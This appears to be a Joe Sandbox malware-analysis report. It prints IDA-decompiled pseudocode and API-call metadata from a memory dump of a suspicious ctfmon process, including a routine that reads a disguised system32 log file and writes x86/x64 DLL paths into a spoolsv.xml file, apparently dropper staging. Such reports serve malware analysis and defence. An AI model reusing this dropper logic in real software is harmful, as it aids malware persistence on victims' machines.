                                                							_t180 =  *((intOrPtr*)(0x996480 + (_t235 >> 6) * 4));
                                                							_t33 = _t180 + _t237 + 0x28;
                                                							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                                                							__eflags =  *_t33;
                                                							E00975D0D(GetLastError());
                                                							goto L10;
                                                						}
                                                						__eflags = _a16 & 0x00000001;
                                                						if((_a16 & 0x00000001) == 0) {
                                                							goto L9;
                                                						}
                                                						_t284 = _t277 - 0x18;
                                                						_v44 = _t234 & 0x7fffffff;
                                                						_t239 = 6;
                                                						_push( &_v24);
                                                						_push(_a12);
                                                						memcpy(_t284,  &_v48, _t239 << 2);
                                                						_t197 = 0;
                                                						_t252 = E0097F844();
                                                						_t277 = _t284 + 0x2c;
                                                						_v12 = _t252;
                                                						__eflags = _t252 - 0xffffffff;
                                                						if(_t252 != 0xffffffff) {
                                                							goto L11;
                                                						}
                                                						goto L9;
                                                					} else {
                                                						 *(E00975D30()) =  *_t186 & 0x00000000;
                                                						 *_t190 = _t263;
                                                						 *((intOrPtr*)(E00975D43())) = 0x18;
                                                						goto L2;
                                                					}
                                                				} else {
                                                					 *(E00975D30()) =  *_t188 & 0x00000000;
                                                					 *_a8 = _t263;
                                                					L2:
                                                					return  *((intOrPtr*)(E00975D43()));
                                                				}
                                                			}

                                                APIs
                                                  • Part of subcall function 0097F844: CreateFileW.KERNEL32(00000000,00000000,?,0097FC1F,?,?,00000000,?,0097FC1F,00000000,0000000C), ref: 0097F861
                                                • GetLastError.KERNEL32 ref: 0097FC8A
                                                • __dosmaperr.LIBCMT ref: 0097FC91
                                                • GetFileType.KERNEL32(00000000), ref: 0097FC9D
                                                • GetLastError.KERNEL32 ref: 0097FCA7
                                                • __dosmaperr.LIBCMT ref: 0097FCB0
                                                • CloseHandle.KERNEL32(00000000), ref: 0097FCD0
                                                • CloseHandle.KERNEL32(?), ref: 0097FE1A
                                                • GetLastError.KERNEL32 ref: 0097FE4C
                                                • __dosmaperr.LIBCMT ref: 0097FE53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: cfae9ffd9055188542784bd4ae28beb8ea24abdd01832adc13cf00fa08d95499
                                                • Instruction ID: 1ab9ce4df0f30ac34a09128037f427db8ae8d7d7163b2ece860b245ed49e7071
                                                • Opcode Fuzzy Hash: cfae9ffd9055188542784bd4ae28beb8ea24abdd01832adc13cf00fa08d95499
                                                • Instruction Fuzzy Hash: 16A14633A241488FDF19DF68D865BAD3BA4AB46324F148169E819EF3E1D7348D02DB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E00981A09(void* __ebx, void* __edi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, short* _a20, char* _a24, int _a28, int _a32) {
                                                				signed int _v8;
                                                				char _v22;
                                                				struct _cpinfo _v28;
                                                				short* _v32;
                                                				int _v36;
                                                				char* _v40;
                                                				int _v44;
                                                				intOrPtr _v48;
                                                				void* _v60;
                                                				void* __esi;
                                                				signed int _t63;
                                                				int _t70;
                                                				signed int _t72;
                                                				short* _t73;
                                                				signed int _t77;
                                                				short* _t87;
                                                				void* _t89;
                                                				void* _t92;
                                                				int _t99;
                                                				short _t101;
                                                				intOrPtr _t102;
                                                				signed int _t112;
                                                				char* _t114;
                                                				char* _t115;
                                                				void* _t120;
                                                				void* _t121;
                                                				intOrPtr _t122;
                                                				intOrPtr _t123;
                                                				intOrPtr* _t125;
                                                				short* _t126;
                                                				short* _t127;
                                                				signed int _t128;
                                                				short* _t129;
                                                
                                                				_t63 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t63 ^ _t128;
                                                				_t127 = _a20;
                                                				_v44 = _a4;
                                                				_v48 = _a8;
                                                				_t67 = _a24;
                                                				_v40 = _a24;
                                                				_t125 = _a16;
                                                				_v36 = _t125;
                                                				if(_t127 <= 0) {
                                                					if(_t127 >= 0xffffffff) {
                                                						goto L2;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				} else {
                                                					_t127 = E0098002B(_t125, _t127);
                                                					_t67 = _v40;
                                                					L2:
                                                					_t99 = _a28;
                                                					if(_t99 <= 0) {
                                                						if(_t99 < 0xffffffff) {
                                                							goto L5;
                                                						} else {
                                                							goto L7;
                                                						}
                                                					} else {
                                                						_t99 = E0098002B(_t67, _t99);
                                                						L7:
                                                						_t70 = _a32;
                                                						if(_t70 == 0) {
                                                							_t70 =  *( *_v44 + 8);
                                                							_a32 = _t70;
                                                						}
                                                						if(_t127 == 0 || _t99 == 0) {
                                                							if(_t127 != _t99) {
                                                								if(_t99 <= 1) {
                                                									if(_t127 <= 1) {
                                                										if(GetCPInfo(_t70,  &_v28) == 0) {
                                                											goto L5;
                                                										} else {
                                                											if(_t127 <= 0) {
                                                												if(_t99 <= 0) {
                                                													goto L36;
                                                												} else {
                                                													_t89 = 2;
                                                													if(_v28 >= _t89) {
                                                														_t114 =  &_v22;
                                                														if(_v22 != 0) {
                                                															_t127 = _v40;
                                                															while(1) {
                                                																_t122 =  *((intOrPtr*)(_t114 + 1));
                                                																if(_t122 == 0) {
                                                																	goto L15;
                                                																}
                                                																_t101 =  *_t127;
                                                																if(_t101 <  *_t114 || _t101 > _t122) {
                                                																	_t114 = _t114 + _t89;
                                                																	if( *_t114 != 0) {
                                                																		continue;
                                                																	} else {
                                                																		goto L15;
                                                																	}
                                                																}
                                                																goto L63;
                                                															}
                                                														}
                                                													}
                                                													goto L15;
                                                												}
                                                											} else {
                                                												_t92 = 2;
                                                												if(_v28 >= _t92) {
                                                													_t115 =  &_v22;
                                                													if(_v22 != 0) {
                                                														while(1) {
                                                															_t123 =  *((intOrPtr*)(_t115 + 1));
                                                															if(_t123 == 0) {
                                                																goto L17;
                                                															}
                                                															_t102 =  *_t125;
                                                															if(_t102 <  *_t115 || _t102 > _t123) {
                                                																_t115 = _t115 + _t92;
                                                																if( *_t115 != 0) {
                                                																	continue;
                                                																} else {
                                                																	goto L17;
                                                																}
                                                															}
                                                															goto L63;
                                                														}
                                                													}
                                                												}
                                                												goto L17;
                                                											}
                                                										}
                                                									} else {
                                                										L17:
                                                										_push(3);
                                                										goto L13;
                                                									}
                                                								} else {
                                                									L15:
                                                								}
                                                							} else {
                                                								_push(2);
                                                								L13:
                                                							}
                                                						} else {
                                                							L36:
                                                							_t126 = 0;
                                                							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t127, 0, 0);
                                                							_v44 = _t72;
                                                							if(_t72 == 0) {
                                                								L5:
                                                							} else {
                                                								_t120 = _t72 + _t72;
                                                								asm("sbb eax, eax");
                                                								if((_t120 + 0x00000008 & _t72) == 0) {
                                                									_t73 = 0;
                                                									_v32 = 0;
                                                									goto L45;
                                                								} else {
                                                									asm("sbb eax, eax");
                                                									_t85 = _t72 & _t120 + 0x00000008;
                                                									_t112 = _t120 + 8;
                                                									if((_t72 & _t120 + 0x00000008) > 0x400) {
                                                										asm("sbb eax, eax");
                                                										_t87 = E00977882(_t112, _t85 & _t112);
                                                										_v32 = _t87;
                                                										if(_t87 == 0) {
                                                											goto L61;
                                                										} else {
                                                											 *_t87 = 0xdddd;
                                                											goto L43;
                                                										}
                                                									} else {
                                                										asm("sbb eax, eax");
                                                										E00983C70();
                                                										_t87 = _t129;
                                                										_v32 = _t87;
                                                										if(_t87 == 0) {
                                                											L61:
                                                											_t100 = _v32;
                                                										} else {
                                                											 *_t87 = 0xcccc;
                                                											L43:
                                                											_t73 =  &(_t87[4]);
                                                											_v32 = _t73;
                                                											L45:
                                                											if(_t73 == 0) {
                                                												goto L61;
                                                											} else {
                                                												_t127 = _a32;
                                                												if(MultiByteToWideChar(_t127, 1, _v36, _t127, _t73, _v44) == 0) {
                                                													goto L61;
                                                												} else {
                                                													_t77 = MultiByteToWideChar(_t127, 9, _v40, _t99, _t126, _t126);
                                                													_v36 = _t77;
                                                													if(_t77 == 0) {
                                                														goto L61;
                                                													} else {
                                                														_t121 = _t77 + _t77;
                                                														_t108 = _t121 + 8;
                                                														asm("sbb eax, eax");
                                                														if((_t121 + 0x00000008 & _t77) == 0) {
                                                															_t127 = _t126;
                                                															goto L56;
                                                														} else {
                                                															asm("sbb eax, eax");
                                                															_t81 = _t77 & _t121 + 0x00000008;
                                                															_t108 = _t121 + 8;
                                                															if((_t77 & _t121 + 0x00000008) > 0x400) {
                                                																asm("sbb eax, eax");
                                                																_t127 = E00977882(_t108, _t81 & _t108);
                                                																_pop(_t108);
                                                																if(_t127 == 0) {
                                                																	goto L59;
                                                																} else {
                                                																	 *_t127 = 0xdddd;
                                                																	goto L54;
                                                																}
                                                															} else {
                                                																asm("sbb eax, eax");
                                                																E00983C70();
                                                																_t127 = _t129;
                                                																if(_t127 == 0) {
                                                																	L59:
                                                																	_t100 = _v32;
                                                																} else {
                                                																	 *_t127 = 0xcccc;
                                                																	L54:
                                                																	_t127 =  &(_t127[4]);
                                                																	L56:
                                                																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t127, _v36) == 0) {
                                                																		goto L59;
                                                																	} else {
                                                																		_t100 = _v32;
                                                																		_t126 = E00977DA7(_t108, _v48, _a12, _v32, _v44, _t127, _v36, _t126, _t126, _t126);
                                                																	}
                                                																}
                                                															}
                                                														}
                                                														E0097A677(_t127);
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								E0097A677(_t100);
                                                							}
                                                						}
                                                					}
                                                				}
                                                				L63:
                                                				return E00970A5D(_v8 ^ _t128, _t127);
                                                			}


                                                APIs
                                                • GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,?,00981CE2,?,?,?,?,?,?,?,?,?), ref: 00981AB5
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,00981CE2,?,?,?,?,?,?,?,?), ref: 00981B38
                                                • __alloca_probe_16.LIBCMT ref: 00981B70
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00981CE2,?,00981CE2,?,?,?,?,?,?,?,?), ref: 00981BCB
                                                • __alloca_probe_16.LIBCMT ref: 00981C1A
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,00981CE2,?,?,?,?,?,?,?,?), ref: 00981BE2
                                                  • Part of subcall function 00977882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 009778B4
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,00981CE2,?,?,?,?,?,?,?,?), ref: 00981C5E
                                                • __freea.LIBCMT ref: 00981C89
                                                • __freea.LIBCMT ref: 00981C95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                • String ID: /LU5/
                                                • API String ID: 201697637-937868281
                                                • Opcode ID: dbefcb341ca2c60778029dc747144157c5f4d94cc1ba1c5029160c7cba274444
                                                • Instruction ID: 8a064d56c3297b763d1d27d7fc43d7d3d07c58145120183310eaf873d32ee883
                                                • Opcode Fuzzy Hash: dbefcb341ca2c60778029dc747144157c5f4d94cc1ba1c5029160c7cba274444
                                                • Instruction Fuzzy Hash: 8191D272E112169ADF24AF64C881EFEBBBDAF49710F184659E845E7341E734CC42CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00968BB0(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                				long _v8;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				char _v28;
                                                				void* _v32;
                                                				struct _CRITICAL_SECTION _v56;
                                                				long _v60;
                                                				long _v64;
                                                				void* _v68;
                                                				char _v72;
                                                				long _v76;
                                                				void* __esi;
                                                				signed int _t63;
                                                				signed int _t64;
                                                				void* _t67;
                                                				void* _t75;
                                                				void* _t82;
                                                				void* _t90;
                                                				void* _t92;
                                                				void* _t95;
                                                				void* _t98;
                                                				void* _t100;
                                                				intOrPtr* _t112;
                                                				void* _t113;
                                                				void* _t115;
                                                				intOrPtr _t117;
                                                				intOrPtr* _t124;
                                                				signed char* _t135;
                                                				intOrPtr* _t139;
                                                				intOrPtr _t142;
                                                				void* _t146;
                                                				struct _CRITICAL_SECTION* _t147;
                                                				signed int _t148;
                                                				void* _t149;
                                                				void* _t150;
                                                				void* _t151;
                                                
                                                				_push(0xffffffff);
                                                				_push(E00984728);
                                                				_push( *[fs:0x0]);
                                                				_t150 = _t149 - 0x3c;
                                                				_t63 =  *0x98f008; // 0x35554c2f
                                                				_t64 = _t63 ^ _t148;
                                                				_v20 = _t64;
                                                				_push(_t64);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t145 = __ecx;
                                                				_t117 = _a12;
                                                				_t142 = _a4;
                                                				_t139 = _a8;
                                                				if(_t117 != 0) {
                                                					__eflags = _t117 - 5;
                                                					if(_t117 != 5) {
                                                						L5:
                                                						E00968690(_t142, _t139, _t117);
                                                						_t67 = E009687A0(_t142);
                                                						__eflags = _t67 - 0xd;
                                                						if(_t67 > 0xd) {
                                                							while(1) {
                                                								_t112 =  *((intOrPtr*)(_t142 + 4));
                                                								_t124 =  &_v28;
                                                								_v28 =  *_t112;
                                                								_v24 =  *((intOrPtr*)(_t112 + 4));
                                                								__eflags =  *((intOrPtr*)(_t145 + 0x214)) -  *_t124;
                                                								if( *((intOrPtr*)(_t145 + 0x214)) !=  *_t124) {
                                                									break;
                                                								}
                                                								__eflags = ( *(_t145 + 0x218) & 0x000000ff) -  *((intOrPtr*)(_t124 + 4));
                                                								if(( *(_t145 + 0x218) & 0x000000ff) !=  *((intOrPtr*)(_t124 + 4))) {
                                                									break;
                                                								} else {
                                                									_t113 =  *(_t112 + 5);
                                                									_v32 = _t113;
                                                									__eflags = _t113;
                                                									if(_t113 != 0) {
                                                										_t126 = _t142;
                                                										_t75 = E009687A0(_t142);
                                                										__eflags = _t75 - _t113;
                                                										if(_t75 >= _t113) {
                                                											_v76 = 0;
                                                											E00968700(_t126,  &_v28, 5);
                                                											E00968700(_t142,  &_v32, 4);
                                                											E00968700(_t142,  &_v76, 4);
                                                											_t115 = _v32 + 0xfffffff3;
                                                											_push(_t115);
                                                											_t82 = E00970AB4(_t145, __eflags);
                                                											_t151 = _t150 + 4;
                                                											_v32 = _t82;
                                                											E00968700(_t142, _t82, _t115);
                                                											_v72 = 0x98cab8;
                                                											_v60 = 0;
                                                											_v68 = 0;
                                                											_v64 = 0;
                                                											InitializeCriticalSection( &_v56);
                                                											_v8 = 0;
                                                											EnterCriticalSection( &_v56);
                                                											_v64 = _v68;
                                                											E00968840( &_v72, 0x400);
                                                											LeaveCriticalSection( &_v56);
                                                											EnterCriticalSection( &_v56);
                                                											_t90 = _v68;
                                                											__eflags = _t90;
                                                											_t133 =  ==  ? 0 : _v64 - _t90;
                                                											_t92 = E009687B0( &_v72, ( ==  ? 0 : _v64 - _t90) + _t115);
                                                											__eflags = _t92 - 0xffffffff;
                                                											if(_t92 != 0xffffffff) {
                                                												E00983DB0(_v64, _v32, _t115);
                                                												_t151 = _t151 + 0xc;
                                                												_t44 =  &_v64;
                                                												 *_t44 = _v64 + _t115;
                                                												__eflags =  *_t44;
                                                											}
                                                											LeaveCriticalSection( &_v56);
                                                											_t135 = _v68;
                                                											_t95 = ( *_t135 & 0x000000ff) - 0x34;
                                                											__eflags = _t95;
                                                											if(_t95 == 0) {
                                                												L16:
                                                												E009688D0(_t145);
                                                											} else {
                                                												__eflags = _t95 == 1;
                                                												if(_t95 == 1) {
                                                													 *(_t145 + 0xc) = _t135[8];
                                                													 *(_t145 + 8) = _t135[4];
                                                													goto L16;
                                                												}
                                                											}
                                                											E00970AAF(_v32);
                                                											_v8 = 0xffffffff;
                                                											_t150 = _t151 + 4;
                                                											_t98 = _v68;
                                                											_v72 = 0x98cab8;
                                                											__eflags = _t98;
                                                											if(_t98 != 0) {
                                                												VirtualFree(_t98, 0, 0x8000);
                                                											}
                                                											DeleteCriticalSection( &_v56);
                                                											_t100 = E009687A0(_t142);
                                                											__eflags = _t100 - 0xd;
                                                											if(_t100 > 0xd) {
                                                												continue;
                                                											} else {
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L22;
                                                							}
                                                							_t147 = _t142 + 0x10;
                                                							EnterCriticalSection(_t147);
                                                							 *((intOrPtr*)(_t142 + 8)) =  *((intOrPtr*)(_t142 + 4));
                                                							E00968840(_t142, 0x400);
                                                							LeaveCriticalSection(_t147);
                                                						}
                                                					} else {
                                                						__eflags =  *_t139 -  *((intOrPtr*)(__ecx + 0x214));
                                                						if( *_t139 !=  *((intOrPtr*)(__ecx + 0x214))) {
                                                							goto L5;
                                                						} else {
                                                							__eflags = ( *(_t139 + 4) & 0x000000ff) -  *((intOrPtr*)(__ecx + 0x218));
                                                							if(( *(_t139 + 4) & 0x000000ff) !=  *((intOrPtr*)(__ecx + 0x218))) {
                                                								goto L5;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					 *((intOrPtr*)( *((intOrPtr*)( *__ecx)) + 0x18))();
                                                				}
                                                				L22:
                                                				 *[fs:0x0] = _v16;
                                                				_pop(_t146);
                                                				return E00970A5D(_v20 ^ _t148, _t146);
                                                			}

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?,00000000), ref: 00968CE3
                                                • EnterCriticalSection.KERNEL32(?), ref: 00968CF4
                                                • LeaveCriticalSection.KERNEL32(?,00000400), ref: 00968D11
                                                • EnterCriticalSection.KERNEL32(?), ref: 00968D1B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Enter$InitializeLeave
                                                • String ID: /LU5/
                                                • API String ID: 2951591641-937868281
                                                • Opcode ID: 3bb1018f96e09c0cc3081dd4dc46719b446607ad9bb9b599741bd24ac940adf5
                                                • Instruction ID: 3c2ed28f33c3e40f5a48efa8dd8dc1bd2a1909e3b27718ad9c7fb866a46ea396
                                                • Opcode Fuzzy Hash: 3bb1018f96e09c0cc3081dd4dc46719b446607ad9bb9b599741bd24ac940adf5
                                                • Instruction Fuzzy Hash: A86170B1A00609EBCF14DFA4D899BAEBBB9FF44310F144619E515E7391DF34A905CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E009673E0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				char _v788;
                                                				void _v103188;
                                                				long _v103192;
                                                				void* _v103196;
                                                				signed int _t29;
                                                				void* _t43;
                                                				char* _t44;
                                                				intOrPtr _t51;
                                                				int _t58;
                                                				void* _t69;
                                                				void* _t76;
                                                				intOrPtr _t88;
                                                				void* _t89;
                                                				void* _t95;
                                                				intOrPtr* _t96;
                                                				long _t97;
                                                				void* _t98;
                                                				void* _t99;
                                                				void* _t100;
                                                				signed int _t101;
                                                
                                                				E00983CA0();
                                                				_t29 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t29 ^ _t101;
                                                				_t88 = _a4;
                                                				_t69 = __edx;
                                                				_v103196 = 0;
                                                				_v103192 = 0;
                                                				if(E00964E60(__ecx,  &_v103196,  &_v103192) != 0) {
                                                					_push(__esi);
                                                					E00973440(_t88,  &_v528, 0, 0x104);
                                                					E00973440(_t88,  &_v268, 0, 0x104);
                                                					E00965180( &_v528, 0x104, "%s\\x86.dll", _t69);
                                                					E00965180( &_v268, 0x104, "%s\\x64.dll", _t69);
                                                					E00973440(_t88,  &_v103188, 0, 0x19000);
                                                					_t95 = _v103196;
                                                					_t43 = E009676A0(_t95);
                                                					if(_t43 == 0x20) {
                                                						_t44 =  &_v528;
                                                						goto L9;
                                                					} else {
                                                						if(_t43 == 0x40) {
                                                							_t44 =  &_v268;
                                                							L9:
                                                							_push(_t44);
                                                							E00965180( &_v103188, 0x19000,  *0x996834, _t88);
                                                							if(_t95 != 0) {
                                                								LocalFree(_t95);
                                                							}
                                                							E00973440(_t88,  &_v788, 0, 0x104);
                                                							E00965180( &_v788, 0x104, "%s\\spoolsv.xml", _t69);
                                                							_t96 =  &_v103188;
                                                							_t76 = _t96 + 1;
                                                							do {
                                                								_t51 =  *_t96;
                                                								_t96 = _t96 + 1;
                                                							} while (_t51 != 0);
                                                							_v103192 = 0;
                                                							_t97 = _t96 - _t76;
                                                							_t89 = CreateFileA( &_v788, 0x40000000, 2, 0, 2, 0x80, 0);
                                                							if(_t89 == 0) {
                                                								goto L6;
                                                							} else {
                                                								_t58 = WriteFile(_t89,  &_v103188, _t97,  &_v103192, 0);
                                                								_push(_t89);
                                                								if(_t58 != 0) {
                                                									CloseHandle();
                                                									_pop(_t99);
                                                									return E00970A5D(_v8 ^ _t101, _t99);
                                                								} else {
                                                									CloseHandle();
                                                									_pop(_t100);
                                                									return E00970A5D(_v8 ^ _t101, _t100);
                                                								}
                                                							}
                                                						} else {
                                                							if(_t95 != 0) {
                                                								LocalFree(_t95);
                                                							}
                                                							L6:
                                                							_pop(_t98);
                                                							return E00970A5D(_v8 ^ _t101, _t98);
                                                						}
                                                					}
                                                				} else {
                                                					return E00970A5D(_v8 ^ _t101, __esi);
                                                				}
                                                			}

                                                APIs
                                                  • Part of subcall function 00964E60: CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490), ref: 00964E81
                                                  • Part of subcall function 00964E60: GetFileSizeEx.KERNEL32(00000000,00000000,?,73B76490), ref: 00964EA1
                                                  • Part of subcall function 00964E60: LocalAlloc.KERNEL32(00000040,00000001,?,73B76490), ref: 00964EB3
                                                  • Part of subcall function 00964E60: CloseHandle.KERNEL32(00000000,?,73B76490), ref: 00964ECF
                                                • LocalFree.KERNEL32(?), ref: 009674C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                • String ID: %s\spoolsv.xml$%s\x64.dll$%s\x86.dll$/LU5/
                                                • API String ID: 1503672127-1416297205
                                                • Opcode ID: c5490fade09fdb896544658cb6331d235a51c1b2aa262bf0e23f739a0515ea43
                                                • Instruction ID: d7b8cc0968e70bba30c6b23e9c1e606e843377e4a68e727467362e3a2fec7a43
                                                • Opcode Fuzzy Hash: c5490fade09fdb896544658cb6331d235a51c1b2aa262bf0e23f739a0515ea43
                                                • Instruction Fuzzy Hash: 9151FBB1A04218ABDB20DB54DC4AFEDB37CAB85B14F4000E5F919A7191DA709B84CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E0097A40F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                				signed int _v8;
                                                				int _v12;
                                                				void* _v24;
                                                				void* __esi;
                                                				signed int _t49;
                                                				signed int _t54;
                                                				int _t58;
                                                				signed int _t60;
                                                				short* _t62;
                                                				signed int _t66;
                                                				short* _t70;
                                                				int _t71;
                                                				int _t78;
                                                				short* _t81;
                                                				signed int _t87;
                                                				signed int _t90;
                                                				void* _t95;
                                                				void* _t96;
                                                				int _t98;
                                                				short* _t101;
                                                				int _t103;
                                                				void* _t104;
                                                				signed int _t106;
                                                				short* _t107;
                                                				void* _t110;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t49 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t49 ^ _t106;
                                                				_t103 = _a20;
                                                				if(_t103 > 0) {
                                                					_t78 = E0098002B(_a16, _t103);
                                                					_t110 = _t78 - _t103;
                                                					_t4 = _t78 + 1; // 0x1
                                                					_t103 = _t4;
                                                					if(_t110 >= 0) {
                                                						_t103 = _t78;
                                                					}
                                                				}
                                                				_t98 = _a32;
                                                				if(_t98 == 0) {
                                                					_t98 =  *( *_a4 + 8);
                                                					_a32 = _t98;
                                                				}
                                                				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                				_v12 = _t54;
                                                				if(_t54 == 0) {
                                                					L38:
                                                					_pop(_t104);
                                                					return E00970A5D(_v8 ^ _t106, _t104);
                                                				} else {
                                                					_t95 = _t54 + _t54;
                                                					_t85 = _t95 + 8;
                                                					asm("sbb eax, eax");
                                                					if((_t95 + 0x00000008 & _t54) == 0) {
                                                						_t81 = 0;
                                                						__eflags = 0;
                                                						L14:
                                                						if(_t81 == 0) {
                                                							L36:
                                                							_t105 = 0;
                                                							L37:
                                                							E0097A677(_t81);
                                                							goto L38;
                                                						}
                                                						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                						_t121 = _t58;
                                                						if(_t58 == 0) {
                                                							goto L36;
                                                						}
                                                						_t100 = _v12;
                                                						_t60 = E00977FD8(_t85, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                                						_t105 = _t60;
                                                						if(_t105 == 0) {
                                                							goto L36;
                                                						}
                                                						if((_a12 & 0x00000400) == 0) {
                                                							_t96 = _t105 + _t105;
                                                							_t87 = _t96 + 8;
                                                							__eflags = _t96 - _t87;
                                                							asm("sbb eax, eax");
                                                							__eflags = _t87 & _t60;
                                                							if((_t87 & _t60) == 0) {
                                                								_t101 = 0;
                                                								__eflags = 0;
                                                								L30:
                                                								__eflags = _t101;
                                                								if(__eflags == 0) {
                                                									L35:
                                                									E0097A677(_t101);
                                                									goto L36;
                                                								}
                                                								_t62 = E00977FD8(_t87, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                								__eflags = _t62;
                                                								if(_t62 == 0) {
                                                									goto L35;
                                                								}
                                                								_push(0);
                                                								_push(0);
                                                								__eflags = _a28;
                                                								if(_a28 != 0) {
                                                									_push(_a28);
                                                									_push(_a24);
                                                								} else {
                                                									_push(0);
                                                									_push(0);
                                                								}
                                                								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                								__eflags = _t105;
                                                								if(_t105 != 0) {
                                                									E0097A677(_t101);
                                                									goto L37;
                                                								} else {
                                                									goto L35;
                                                								}
                                                							}
                                                							_t90 = _t96 + 8;
                                                							__eflags = _t96 - _t90;
                                                							asm("sbb eax, eax");
                                                							_t66 = _t60 & _t90;
                                                							_t87 = _t96 + 8;
                                                							__eflags = _t66 - 0x400;
                                                							if(_t66 > 0x400) {
                                                								__eflags = _t96 - _t87;
                                                								asm("sbb eax, eax");
                                                								_t101 = E00977882(_t87, _t66 & _t87);
                                                								_pop(_t87);
                                                								__eflags = _t101;
                                                								if(_t101 == 0) {
                                                									goto L35;
                                                								}
                                                								 *_t101 = 0xdddd;
                                                								L28:
                                                								_t101 =  &(_t101[4]);
                                                								goto L30;
                                                							}
                                                							__eflags = _t96 - _t87;
                                                							asm("sbb eax, eax");
                                                							E00983C70();
                                                							_t101 = _t107;
                                                							__eflags = _t101;
                                                							if(_t101 == 0) {
                                                								goto L35;
                                                							}
                                                							 *_t101 = 0xcccc;
                                                							goto L28;
                                                						}
                                                						_t70 = _a28;
                                                						if(_t70 == 0) {
                                                							goto L37;
                                                						}
                                                						_t125 = _t105 - _t70;
                                                						if(_t105 > _t70) {
                                                							goto L36;
                                                						}
                                                						_t71 = E00977FD8(0, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                						_t105 = _t71;
                                                						if(_t71 != 0) {
                                                							goto L37;
                                                						}
                                                						goto L36;
                                                					}
                                                					asm("sbb eax, eax");
                                                					_t72 = _t54 & _t95 + 0x00000008;
                                                					_t85 = _t95 + 8;
                                                					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                						__eflags = _t95 - _t85;
                                                						asm("sbb eax, eax");
                                                						_t81 = E00977882(_t85, _t72 & _t85);
                                                						_pop(_t85);
                                                						__eflags = _t81;
                                                						if(__eflags == 0) {
                                                							goto L36;
                                                						}
                                                						 *_t81 = 0xdddd;
                                                						L12:
                                                						_t81 =  &(_t81[4]);
                                                						goto L14;
                                                					}
                                                					asm("sbb eax, eax");
                                                					E00983C70();
                                                					_t81 = _t107;
                                                					if(_t81 == 0) {
                                                						goto L36;
                                                					}
                                                					 *_t81 = 0xcccc;
                                                					goto L12;
                                                				}
                                                			}

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,77109EB0,?,?,?,?,?,0097A660,00000001,00000001,?), ref: 0097A469
                                                • __alloca_probe_16.LIBCMT ref: 0097A4A1
